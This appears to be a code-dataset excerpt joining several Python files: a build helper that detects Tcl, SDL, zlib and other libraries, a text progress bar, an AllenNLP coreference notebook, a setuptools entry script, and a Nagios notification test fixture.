								# Also look inside versioned "tcl8.x"
								# subdirectories of each lib dir.
								for entry in listdir(libpath):
									if entry.startswith('tcl8.'):
										tclpath = libpath + '/' + entry
										if isdir(tclpath):
											yield tclpath
		tclConfigs = {}
		log = open('derived/tcl-search.log', 'w')
		print >> log, 'Looking for Tcl...'
		try:
			for location in iterLocations():
				path = location + '/tclConfig.sh'
				if isfile(path):
					print >> log, 'Config script:', path
					# Source the script and echo its version variables.
					text = captureStdout(
						log,
						"sh -c '. %s && echo %s'" % (
							path, '$TCL_MAJOR_VERSION $TCL_MINOR_VERSION'
							)
						)
					if text is not None:
						try:
							# pylint: disable-msg=E1103
							major, minor = text.split()
							version = int(major), int(minor)
						except ValueError:
							# Output was not two integers; skip this script.
							pass
						else:
							print >> log, 'Found: version %d.%d' % version
							tclConfigs[path] = version
			try:
				# Minimum required version is 8.5.
				# Pick the oldest possible version to minimize the risk of
				# running into incompatible changes.
				tclConfig = min(
					( version, path )
					for path, version in tclConfigs.iteritems()
					if version >= (8, 5)
					)[1]
			except ValueError:
				# min() on an empty sequence: no suitable config found.
				tclConfig = None
				print >> log, 'No suitable versions found.'
			else:
				print >> log, 'Selected:', tclConfig
		finally:
			log.close()
		# Cache the result on the class for subsequent calls.
		cls.tclConfig = tclConfig
		return tclConfig
	@classmethod
	def evalTclConfigExpr(cls, platform, distroRoot, expr, description):
		'''Sources tclConfig.sh and evaluates the given shell expression
		in its context. Returns the stripped result string, or None if no
		config script was found or evaluation produced no output.
		'''
		tclConfig = cls.getTclConfig(platform, distroRoot)
		if tclConfig is None:
			return None
		log = open('derived/tcl-search.log', 'a')
		try:
			print >> log, 'Getting Tcl %s...' % description
			text = captureStdout(
				log,
				shjoin([
					'sh', '-c',
					'. %s && eval "echo \\"%s\\""' % (tclConfig, expr)
					])
				)
			if text is not None:
				print >> log, 'Result: %s' % text.strip()
		finally:
			log.close()
		return None if text is None else text.strip()
	@classmethod
	def getCompileFlags(cls, platform, linkStatic, distroRoot):
		'''Returns the compile flags reported by the Tcl configuration.'''
		if platform == 'android':
			# Use the current ANDROID cross-compilation flags and not the TCL flags. Otherwise, the
			# wrong version of libstdc++ will end-up on the include path; the minimal Android NDK
			# version instead of the more complete GNU version. This is because TCL for Android has
			# been configured with the minimal libstdc++ on the include path in the C(XX) flags and
			# not with the more complete GNU version
			return environ['ANDROID_CXXFLAGS']
		wantShared = not linkStatic or cls.isSystemLibrary(platform)
		# The -DSTATIC_BUILD is a hack to avoid including the complete
		# TCL_DEFS (see 9f1dbddda2) but still being able to link on
		# MinGW (tcl.h depends on this being defined properly).
		return cls.evalTclConfigExpr(
			platform,
			distroRoot,
			'${TCL_INCLUDE_SPEC}' + ('' if wantShared else ' -DSTATIC_BUILD'),
			'compile flags'
			)
	@classmethod
	def getLinkFlags(cls, platform, linkStatic, distroRoot):
		'''Returns the link flags reported by the Tcl configuration, or
		None if the installed Tcl's library type (shared/static) does not
		match the requested link type.
		'''
		if platform == 'android':
			# Use the current ANDROID cross-compilation flags and not the TCL flags to
			# prevent issues with libstdc++ version. See also getCompileFlags()
			return environ['ANDROID_LDFLAGS']
		# Tcl can be built as a shared or as a static library, but not both.
		# Check whether the library type of Tcl matches the one we want.
		wantShared = not linkStatic or cls.isSystemLibrary(platform)
		tclShared = cls.evalTclConfigExpr(
			platform,
			distroRoot,
			'${TCL_SHARED_BUILD}',
			'library type (shared/static)'
			)
		log = open('derived/tcl-search.log', 'a')
		try:
			if tclShared == '0':
				if wantShared:
					print >> log, (
						'Dynamic linking requested, but Tcl installation has '
						'static library.'
						)
					return None
			elif tclShared == '1':
				if not wantShared:
					print >> log, (
						'Static linking requested, but Tcl installation has '
						'dynamic library.'
						)
					return None
			else:
				print >> log, (
					'Unable to determine whether Tcl installation has '
					'shared or static library.'
					)
				return None
		finally:
			log.close()
		# Now get the link flags.
		if wantShared:
			return cls.evalTclConfigExpr(
				platform,
				distroRoot,
				'${TCL_LIB_SPEC}',
				'dynamic link flags'
				)
		else:
			return cls.evalTclConfigExpr(
				platform,
				distroRoot,
				'${TCL_EXEC_PREFIX}/lib/${TCL_LIB_FILE} ${TCL_LIBS}',
				'static link flags'
				)
	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		'''Returns the installed Tcl version as "major.minor<patchlevel>".'''
		return cls.evalTclConfigExpr(
			platform,
			distroRoot,
			'${TCL_MAJOR_VERSION}.${TCL_MINOR_VERSION}${TCL_PATCH_LEVEL}',
			'version'
			)
class Theora(Library):
	'''Theora video decoding library.'''
	libName = 'theoradec'
	makeName = 'THEORA'
	header = '<theora/theoradec.h>'
	function = 'th_decode_ycbcr_out'
	dependsOn = ('OGG', )

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class Vorbis(Library):
	'''Vorbis audio decoding library.'''
	libName = 'vorbis'
	makeName = 'VORBIS'
	header = '<vorbis/codec.h>'
	function = 'vorbis_synthesis_pcmout'
	dependsOn = ('OGG', )

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class ZLib(Library):
	'''zlib compression library.'''
	libName = 'z'
	makeName = 'ZLIB'
	header = '<zlib.h>'
	function = 'inflate'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform in ('android', 'dingux')

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		def execute(cmd, log):
			# ZLIB_VERSION expands to a quoted string; drop the quotes.
			expanded = cmd.expand(log, cls.getHeaders(platform), 'ZLIB_VERSION')
			if expanded is None:
				return None
			return expanded.strip('"')
		return execute
# Build a dictionary of libraries using introspection.
def _discoverLibraries(localObjects):
for obj in localObjects:
if isinstance(obj, type) and issubclass(obj, Library):
if not (obj is Library):
yield obj.makeName, obj
# Maps make name (e.g. 'SDL') to the corresponding Library subclass,
# discovered by scanning the module namespace built up above.
# (dict.itervalues() makes this line Python 2 specific.)
librariesByName = dict(_discoverLibraries(locals().itervalues()))
def allDependencies(makeNames):
	'''Compute the set of all directly and indirectly required libraries to
	build and use the given set of libraries.
	Returns the make names of the required libraries.
	'''
	# Breadth-first expansion of the dependency relation until no new
	# libraries turn up (reflexive-transitive closure).
	closure = set()
	frontier = set(makeNames)
	while frontier:
		closure |= frontier
		nextFrontier = set()
		for makeName in frontier:
			for depName in librariesByName[makeName].dependsOn:
				if depName not in closure:
					nextFrontier.add(depName)
		frontier = nextFrontier
	return closure
| 29.937605 | 92 | 0.694756 |
from executils import captureStdout, shjoin
from os import listdir
from os.path import isdir, isfile
from os import environ
class Library(object):
libName = None
makeName = None
header = None
configScriptName = None
dynamicLibsOption = '--libs'
staticLibsOption = None
function = None
dependsOn = ()
@classmethod
def isSystemLibrary(cls, platform):
return False
@classmethod
def getConfigScript(
cls, platform, linkStatic, distroRoot
):
scriptName = cls.configScriptName
if scriptName is None:
return None
elif platform == 'dingux' and cls.isSystemLibrary(platform):
return '/opt/a320-toolchain/usr/mipsel-a320-linux-uclibc/sysroot/usr/bin/%s' % scriptName
elif distroRoot is None:
return scriptName
else:
return '%s/bin/%s' % (distroRoot, scriptName)
@classmethod
def getHeaders(cls, platform):
header = cls.header
return header if hasattr(header, '__iter__') else (header, )
@classmethod
def getLibName(cls, platform):
return cls.libName
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
flags = [ '`%s --cflags`' % configScript ]
elif distroRoot is None or cls.isSystemLibrary(platform):
flags = []
else:
flags = [ '-I%s/include' % distroRoot ]
dependentFlags = [
librariesByName[name].getCompileFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
return ' '.join(flags + dependentFlags)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
libsOption = (
cls.dynamicLibsOption
if not linkStatic or cls.isSystemLibrary(platform)
else cls.staticLibsOption
)
if libsOption is not None:
return '`%s %s`' % (configScript, libsOption)
if distroRoot is None or cls.isSystemLibrary(platform):
return '-l%s' % cls.getLibName(platform)
else:
flags = [
'%s/lib/lib%s.a' % (distroRoot, cls.getLibName(platform))
] if linkStatic else [
'-L%s/lib -l%s' % (distroRoot, cls.getLibName(platform))
]
dependentFlags = [
librariesByName[name].getLinkFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
systemDependentFlags = list(cls.getSystemDependentFlags(platform))
return ' '.join(flags + dependentFlags + systemDependentFlags)
@classmethod
def getSystemDependentFlags(cls, platform):
return ()
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is None:
return 'unknown'
else:
return '`%s --version`' % configScript
class FreeType(Library):
libName = 'freetype'
makeName = 'FREETYPE'
header = ('<ft2build.h>', 'FT_FREETYPE_H')
configScriptName = 'freetype-config'
function = 'FT_Open_Face'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getConfigScript(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
if distroRoot == '/usr/local':
distroRoot = '/usr/X11R6'
return super(FreeType, cls).getConfigScript(
platform, linkStatic, distroRoot
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
return '`%s --ftversion`' % configScript
class GL(Library):
libName = 'GL'
makeName = 'GL'
function = 'glGenTextures'
@classmethod
def isSystemLibrary(cls, platform):
return not platform.endswith('bsd')
@classmethod
def getHeaders(cls, platform):
if platform == 'darwin':
return ('<OpenGL/gl.h>', )
else:
return ('<GL/gl.h>', )
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
return '-I/usr/X11R6/include -I/usr/X11R7/include'
else:
return super(GL, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'darwin':
return '-framework OpenGL'
elif platform.startswith('mingw'):
return '-lopengl32'
elif platform in ('netbsd', 'openbsd'):
return '-L/usr/X11R6/lib -L/usr/X11R7/lib -lGL'
else:
return super(GL, cls).getLinkFlags(platform, linkStatic, distroRoot)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
versionPairs = tuple(
( major, minor )
for major in range(1, 10)
for minor in range(0, 10)
)
version = cmd.expand(log, cls.getHeaders(platform), *(
'GL_VERSION_%d_%d' % pair for pair in versionPairs
))
try:
return '%d.%d' % max(
ver
for ver, exp in zip(versionPairs, version)
if exp is not None
)
except ValueError:
return None
return execute
class GLEW(Library):
makeName = 'GLEW'
header = '<GL/glew.h>'
function = 'glewInit'
dependsOn = ('GL', )
@classmethod
def getLibName(cls, platform):
if platform.startswith('mingw'):
return 'glew32'
else:
return 'GLEW'
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(GLEW, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if platform.startswith('mingw') and linkStatic:
return '%s -DGLEW_STATIC' % flags
else:
return flags
class LibPNG(Library):
libName = 'png12'
makeName = 'PNG'
header = '<png.h>'
configScriptName = 'libpng-config'
dynamicLibsOption = '--ldflags'
function = 'png_write_image'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class LibXML2(Library):
libName = 'xml2'
makeName = 'XML'
header = '<libxml/parser.h>'
configScriptName = 'xml2-config'
function = 'xmlParseDocument'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(LibXML2, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if not linkStatic or cls.isSystemLibrary(platform):
return flags
else:
return flags + ' -DLIBXML_STATIC'
class OGG(Library):
libName = 'ogg'
makeName = 'OGG'
header = '<ogg/ogg.h>'
function = 'ogg_stream_init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL(Library):
libName = 'SDL'
makeName = 'SDL'
header = '<SDL.h>'
configScriptName = 'sdl-config'
staticLibsOption = '--static-libs'
function = 'SDL_Init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL_ttf(Library):
libName = 'SDL_ttf'
makeName = 'SDL_TTF'
header = '<SDL_ttf.h>'
function = 'TTF_OpenFont'
dependsOn = ('SDL', 'FREETYPE')
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform),
'SDL_TTF_MAJOR_VERSION',
'SDL_TTF_MINOR_VERSION',
'SDL_TTF_PATCHLEVEL',
)
return None if None in version else '%s.%s.%s' % version
return execute
class TCL(Library):
libName = 'tcl'
makeName = 'TCL'
header = '<tcl.h>'
function = 'Tcl_CreateInterp'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getTclConfig(cls, platform, distroRoot):
if hasattr(cls, 'tclConfig'):
return cls.tclConfig
def iterLocations():
if platform == 'android':
sdl_android_port_path = environ['SDL_ANDROID_PORT_PATH']
libpath = sdl_android_port_path + '/project/libs/armeabi'
yield libpath
tclpath = sdl_android_port_path + '/project/jni/tcl8.5/unix'
yield tclpath
else:
if distroRoot is None or cls.isSystemLibrary(platform):
roots = ('/usr/local', '/usr')
else:
roots = (distroRoot, )
for root in roots:
if isdir(root):
for libdir in ('lib', 'lib64', 'lib/tcl'):
libpath = root + '/' + libdir
if isdir(libpath):
yield libpath
for entry in listdir(libpath):
if entry.startswith('tcl8.'):
tclpath = libpath + '/' + entry
if isdir(tclpath):
yield tclpath
tclConfigs = {}
log = open('derived/tcl-search.log', 'w')
print >> log, 'Looking for Tcl...'
try:
for location in iterLocations():
path = location + '/tclConfig.sh'
if isfile(path):
print >> log, 'Config script:', path
text = captureStdout(
log,
"sh -c '. %s && echo %s'" % (
path, '$TCL_MAJOR_VERSION $TCL_MINOR_VERSION'
)
)
if text is not None:
try:
major, minor = text.split()
version = int(major), int(minor)
except ValueError:
pass
else:
print >> log, 'Found: version %d.%d' % version
tclConfigs[path] = version
try:
tclConfig = min(
( version, path )
for path, version in tclConfigs.iteritems()
if version >= (8, 5)
)[1]
except ValueError:
tclConfig = None
print >> log, 'No suitable versions found.'
else:
print >> log, 'Selected:', tclConfig
finally:
log.close()
cls.tclConfig = tclConfig
return tclConfig
@classmethod
def evalTclConfigExpr(cls, platform, distroRoot, expr, description):
tclConfig = cls.getTclConfig(platform, distroRoot)
if tclConfig is None:
return None
log = open('derived/tcl-search.log', 'a')
try:
print >> log, 'Getting Tcl %s...' % description
text = captureStdout(
log,
shjoin([
'sh', '-c',
'. %s && eval "echo \\"%s\\""' % (tclConfig, expr)
])
)
if text is not None:
print >> log, 'Result: %s' % text.strip()
finally:
log.close()
return None if text is None else text.strip()
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_INCLUDE_SPEC}' + ('' if wantShared else ' -DSTATIC_BUILD'),
'compile flags'
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
tclShared = cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_SHARED_BUILD}',
'library type (shared/static)'
)
log = open('derived/tcl-search.log', 'a')
try:
if tclShared == '0':
if wantShared:
print >> log, (
'Dynamic linking requested, but Tcl installation has '
'static library.'
)
return None
elif tclShared == '1':
if not wantShared:
print >> log, (
'Static linking requested, but Tcl installation has '
'dynamic library.'
)
return None
else:
print >> log, (
'Unable to determine whether Tcl installation has '
'shared or static library.'
)
return None
finally:
log.close()
if wantShared:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_LIB_SPEC}',
'dynamic link flags'
)
else:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_EXEC_PREFIX}/lib/${TCL_LIB_FILE} ${TCL_LIBS}',
'static link flags'
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_MAJOR_VERSION}.${TCL_MINOR_VERSION}${TCL_PATCH_LEVEL}',
'version'
)
class Theora(Library):
libName = 'theoradec'
makeName = 'THEORA'
header = '<theora/theoradec.h>'
function = 'th_decode_ycbcr_out'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class Vorbis(Library):
libName = 'vorbis'
makeName = 'VORBIS'
header = '<vorbis/codec.h>'
function = 'vorbis_synthesis_pcmout'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class ZLib(Library):
libName = 'z'
makeName = 'ZLIB'
header = '<zlib.h>'
function = 'inflate'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform), 'ZLIB_VERSION')
return None if version is None else version.strip('"')
return execute
# Build a dictionary of libraries using introspection.
def _discoverLibraries(localObjects):
for obj in localObjects:
if isinstance(obj, type) and issubclass(obj, Library):
if not (obj is Library):
yield obj.makeName, obj
librariesByName = dict(_discoverLibraries(locals().itervalues()))
def allDependencies(makeNames):
# Compute the reflexive-transitive closure.
transLibs = set()
newLibs = set(makeNames)
while newLibs:
transLibs.update(newLibs)
newLibs = set(
depMakeName
for makeName in newLibs
for depMakeName in librariesByName[makeName].dependsOn
if depMakeName not in transLibs
)
return transLibs
| true | true |
f72ec2738fdcaa32e93f95407b764fa52d3f3f71 | 598 | py | Python | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 2,177 | 2015-01-02T09:56:51.000Z | 2022-03-27T01:48:37.000Z | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 29 | 2015-01-24T17:38:59.000Z | 2021-08-29T03:39:30.000Z | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 516 | 2015-01-02T18:48:29.000Z | 2022-01-26T07:12:35.000Z |
import sys
class SimpleProgressBar:
	'''Renders a single-line text progress bar on stdout.
	update() may be called repeatedly; the bar is redrawn in place via a
	carriage return. done() terminates the line once a bar has been shown.
	(Python 2 code: bare "print" statement in done().)
	'''
	def __init__(self):
		# Whether a bar has been drawn since the last done().
		self.displayed = False
	def update(self, percent):
		'''Redraws the bar; percent is a fraction in [0, 1] (clamped).'''
		self.displayed = True
		bar_size = 40
		percent *= 100.0
		if percent > 100:
			percent = 100.0
		# Number of full '=' cells, plus one partial cell rendered as
		# '=' (more than 80% full), '-' (more than 40%) or nothing.
		dots = int(bar_size * percent / 100)
		plus = percent / 100 * bar_size - dots
		if plus > 0.8:
			plus = '='
		elif plus > 0.4:
			plus = '-'
		else:
			plus = ''
		percent = int(percent)
		bar = '=' * dots + plus
		bar = '{0:>3}%[{1:<40}]'.format(percent, bar)
		# '\r' returns to column 0 so the new bar overwrites the old one.
		sys.stdout.write('\r'+bar)
		sys.stdout.flush()
	def done(self):
		'''Ends the progress line, if one was displayed.'''
		if self.displayed:
			print
			self.displayed = False
| 19.290323 | 47 | 0.607023 |
import sys
class SimpleProgressBar:
def __init__(self):
self.displayed = False
def update(self, percent):
self.displayed = True
bar_size = 40
percent *= 100.0
if percent > 100:
percent = 100.0
dots = int(bar_size * percent / 100)
plus = percent / 100 * bar_size - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
percent = int(percent)
bar = '=' * dots + plus
bar = '{0:>3}%[{1:<40}]'.format(percent, bar)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def done(self):
if self.displayed:
print
self.displayed = False
| true | true |
f72ec42eb3efc0949d13fb798398c8eed884a8bb | 2,368 | py | Python | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | 1 | 2022-02-11T19:36:40.000Z | 2022-02-11T19:36:40.000Z | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | null | null | null | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | 1 | 2021-06-08T18:54:40.000Z | 2021-06-08T18:54:40.000Z | #!/usr/bin/env python
# coding: utf-8
# In[1]:
from allennlp.predictors.predictor import Predictor
# ## Instantiate AllenNLP `Predictor`
# 1. Load the same model that is used in the [demo](https://demo.allennlp.org/coreference-resolution) (*don't get alarmed by the warning - we don't need to fine-tune the model to use it*).
# 2. Get the prediction :)
# In[2]:
model_url = 'https://storage.googleapis.com/allennlp-public-models/coref-spanbert-large-2020.02.27.tar.gz'
predictor = Predictor.from_path(model_url)
# In[3]:
text = "Eva and Martha didn't want their friend Jenny to feel lonely so they invited her to the party in Las Vegas."
prediction = predictor.predict(document=text)
# ## Coreference resolution with `Allen Institute`
# What we get as a result (`prediction`) is a dictionary as Allen outputs multiple different information at once.
# The ones that we found to be using the most are:
#
# | Key | Type | Description
# |:--------------------------|:-------------------|:----------------------------------------------------
# | `top_spans` | `List[List[int]]` | List of `spaCy` token indices pairs representing spans
# | `document` | `List[str]` | Document's tokens (from `spaCy`; but represented as string not Token)
# | `clusters` | `List[List[List[int]]]` | Clusters of spans (represented by token indices pairs)
# In[4]:
# it's our original text (with extra whitespaces as we trivialy just joined tokens with ' ')
' '.join(prediction['document'])
# In[5]:
# and the found clusters - however, they are not easily understood...
prediction['clusters']
# In[6]:
# but that's how it looks after coreference resolution (notice the possessive!)
predictor.coref_resolved(text)
# As Allen's coreference resolution `Predictor` has quite a limited number of functionalities, in order to turn its output to a more readable one, we need to manually write some functions:
# In[7]:
def get_span_words(span, document):
    """Join the document tokens covered by *span* (inclusive indices)."""
    first, last = span[0], span[1]
    return ' '.join(document[first:last + 1])
def print_clusters(prediction):
    """Pretty-print each coreference cluster as '<first mention>: [m1; m2; ...]'."""
    document = prediction['document']
    for cluster in prediction['clusters']:
        mentions = [get_span_words(span, document) for span in cluster]
        print('%s: [%s]' % (mentions[0], '; '.join(mentions)))
# In[8]:
print_clusters(prediction)
| 29.234568 | 188 | 0.669341 |
from allennlp.predictors.predictor import Predictor
odels/coref-spanbert-large-2020.02.27.tar.gz'
predictor = Predictor.from_path(model_url)
text = "Eva and Martha didn't want their friend Jenny to feel lonely so they invited her to the party in Las Vegas."
prediction = predictor.predict(document=text)
# ## Coreference resolution with `Allen Institute`
# What we get as a result (`prediction`) is a dictionary as Allen outputs multiple different information at once.
# The ones that we found to be using the most are:
#
# | Key | Type | Description
# |:--------------------------|:-------------------|:----------------------------------------------------
# | `top_spans` | `List[List[int]]` | List of `spaCy` token indices pairs representing spans
# | `document` | `List[str]` | Document's tokens (from `spaCy`; but represented as string not Token)
' '.join(prediction['document'])
# In[5]:
# and the found clusters - however, they are not easily understood...
prediction['clusters']
# In[6]:
# but that's how it looks after coreference resolution (notice the possessive!)
predictor.coref_resolved(text)
# In[7]:
def get_span_words(span, document):
return ' '.join(document[span[0]:span[1]+1])
def print_clusters(prediction):
document, clusters = prediction['document'], prediction['clusters']
for cluster in clusters:
print(get_span_words(cluster[0], document) + ': ', end='')
print(f"[{'; '.join([get_span_words(span, document) for span in cluster])}]")
# In[8]:
print_clusters(prediction)
| true | true |
f72ec4c3bf5925d67bf0defaf42a32236624789c | 1,002 | py | Python | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | #!"f:\opencv projects\tesseract ocr\venv\scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'future==0.18.2'
try:
    # Python 3.8+: stdlib entry-point metadata.
    from importlib.metadata import distribution
except ImportError:
    try:
        # Backport package for older interpreters.
        from importlib_metadata import distribution
    except ImportError:
        # Last resort: setuptools' pkg_resources (heavier import).
        from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
    """Load the entry point *name* in *group* from the distribution named in
    *spec* ('dist==version'); raises StopIteration if it is missing."""
    dist_name, _, _ = spec.partition('==')
    matches = (
        entry_point
        for entry_point in distribution(dist_name).entry_points
        if entry_point.group == group and entry_point.name == name
    )
    return next(matches).load()
# Keep pkg_resources' load_entry_point if it was imported above; otherwise
# install the importlib-based shim under the same name.
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
    # Strip the '-script.py' / '.exe' wrapper suffix so argv[0] matches the
    # console-script name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| 29.470588 | 81 | 0.702595 |
import re
import sys
__requires__ = 'future==0.18.2'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| true | true |
f72ec7cea5ff8e51a73eb0ada22fc04b55636c4f | 9,232 | py | Python | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | # Copyright 2010 ITA Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from twisted.trial import unittest
from nagcat import notify
import coil
# Fixture: a realistic snapshot of the NAGIOS_* environment variables Nagios
# exports to a host notification handler. Consumed via notify.Macros below.
ENVIRONMENT_HOST = {
    # Host Macros
    'NAGIOS_HOSTNAME': "localhost",
    'NAGIOS_HOSTDISPLAYNAME': "localhost",
    'NAGIOS_HOSTALIAS': "localhost",
    'NAGIOS_HOSTADDRESS': "127.0.0.1",
    'NAGIOS_HOSTSTATE': "UP",
    'NAGIOS_HOSTSTATEID': "0",
    'NAGIOS_LASTHOSTSTATE': "UP",
    'NAGIOS_LASTHOSTSTATEID': "0",
    'NAGIOS_HOSTSTATETYPE': "HARD",
    'NAGIOS_HOSTATTEMPT': "1",
    'NAGIOS_MAXHOSTATTEMPTS': "3",
    'NAGIOS_HOSTEVENTID': "0",
    'NAGIOS_LASTHOSTEVENTID': "0",
    'NAGIOS_HOSTPROBLEMID': "0",
    'NAGIOS_LASTHOSTPROBLEMID': "0",
    'NAGIOS_HOSTLATENCY': "0.123",
    'NAGIOS_HOSTEXECUTIONTIME': "4.012",
    'NAGIOS_HOSTDURATION': "35d 15h 31m 49s",
    'NAGIOS_HOSTDURATIONSEC': "3079909",
    'NAGIOS_HOSTDOWNTIME': "0",
    'NAGIOS_HOSTPERCENTCHANGE': "0.0",
    'NAGIOS_HOSTGROUPNAMES': "a_group,b_group",
    'NAGIOS_LASTHOSTCHECK': "1260009929",
    'NAGIOS_LASTHOSTSTATECHANGE': "1256929950",
    'NAGIOS_LASTHOSTUP': "1260009939",
    'NAGIOS_LASTHOSTDOWN': "0",
    'NAGIOS_LASTHOSTUNREACHABLE': "0",
    'NAGIOS_HOSTOUTPUT': "PING OK - Packet loss = 0%, RTA = 2.00 ms",
    'NAGIOS_LONGHOSTOUTPUT': "",
    'NAGIOS_HOSTPERFDATA': "rta=10.778000ms;3000.000000;5000.000000;0.000000 pl=0%;80;100;0",
    'NAGIOS_HOSTCHECKCOMMAND': "check_host_alive",
    'NAGIOS_HOSTACTIONURL': "",
    'NAGIOS_HOSTNOTESURL': "",
    'NAGIOS_HOSTNOTES': "",
